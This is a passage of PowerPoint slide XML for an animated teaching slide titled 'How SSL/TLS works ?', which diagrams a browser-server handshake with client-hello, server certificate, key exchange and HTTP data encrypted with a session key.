      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="956" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="964" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1001" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="974" grpId="4"/>
    </p:bldLst>
  </p:timing>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7" name="How SSL/TLS works ?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975359" y="352213"/>
            <a:ext cx="11054082" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="100000" lnSpcReduction="0"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>How SSL/TLS works ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1008" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975359" y="2384213"/>
            <a:ext cx="1625601" cy="5743787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BBE0E3"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="3400">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1009" name="browser"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1170431" y="1864021"/>
            <a:ext cx="1407491" cy="52481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2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3400">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010" name="server"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9995948" y="1842346"/>
            <a:ext cx="1130720" cy="524816"/>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sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3400">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1013" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11595946" y="3359573"/>
            <a:ext cx="1083734" cy="650241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1083733" cy="650240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1011" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1083734" cy="650241"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1012" name="SK"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="62712"/>
              <a:ext cx="1083734" cy="5248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1300480">
                <a:defRPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="F2F2F2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="F2F2F2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>SK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1016" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2600959" y="2297514"/>
            <a:ext cx="7369389" cy="524816"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7369387" cy="524814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1014" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="520192"/>
              <a:ext cx="7369389" cy="2258"/>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650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1015" name="client-hello"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2600960" y="0"/>
              <a:ext cx="1842614" cy="5248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2800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3400">
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>client-hello</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1019" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2600959" y="3179825"/>
            <a:ext cx="7369389" cy="524816"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7369387" cy="524814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1017" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="-1" y="504867"/>
              <a:ext cx="7369389" cy="2260"/>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650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1018" name="server-hello   +   server-cert (PK)"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1213781" y="0"/>
              <a:ext cx="5242295" cy="5248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lgn="l" defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>server-hello   +   server-cert (</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>PK</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1022" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2600959" y="4328583"/>
            <a:ext cx="7369388" cy="1842347"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7369386" cy="1842346"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1020" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="7369387" cy="1842347"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F2"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2800">
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1021" name="key exchange"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1733973" y="-1"/>
              <a:ext cx="2337120" cy="5248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2800">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>key exchange</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1023" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9970346" y="2275839"/>
            <a:ext cx="1625601" cy="5743788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BBE0E3"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="3400">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1026" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11595946" y="2600960"/>
            <a:ext cx="1083734" cy="650241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1083733" cy="650240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1024" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1083734" cy="650241"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="9C9CDF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1025" name="cert"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1083734" cy="61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lgn="l" defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr>
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>cert</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1031" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="975360" y="4647352"/>
            <a:ext cx="9678754" cy="1484560"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9678753" cy="1484558"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1027" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1625599" y="1148758"/>
              <a:ext cx="7369387" cy="2258"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1028" name="client-key-exchange:   E(k,PK)"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2554426" y="650240"/>
              <a:ext cx="5024262" cy="5248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2800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3400">
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t> client-key-exchange:   E(k,PK)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1029" name="rand. k"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1625599" cy="61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lgn="l" defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr>
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>rand. k</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1030" name="k"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9320105" y="873336"/>
              <a:ext cx="358649" cy="611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3400">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr>
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>k</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1034" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2600959" y="6786025"/>
            <a:ext cx="7369389" cy="550475"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7369387" cy="550474"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="548217"/>
              <a:ext cx="7369389" cy="2258"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1033" name="HTTP data encrypted with k"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="774746" y="0"/>
              <a:ext cx="4523852" cy="5248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l" defTabSz="1300480">
                <a:defRPr sz="2800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3400">
                  <a:latin typeface="Times"/>
                  <a:ea typeface="Times"/>
                  <a:cs typeface="Times"/>
                  <a:sym typeface="Times"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2800">
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>HTTP data encrypted with k</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016"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1016"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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2" presetID="2" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1019"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1019"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="101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3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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16" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1031" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1034" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1019" grpId="2"/>
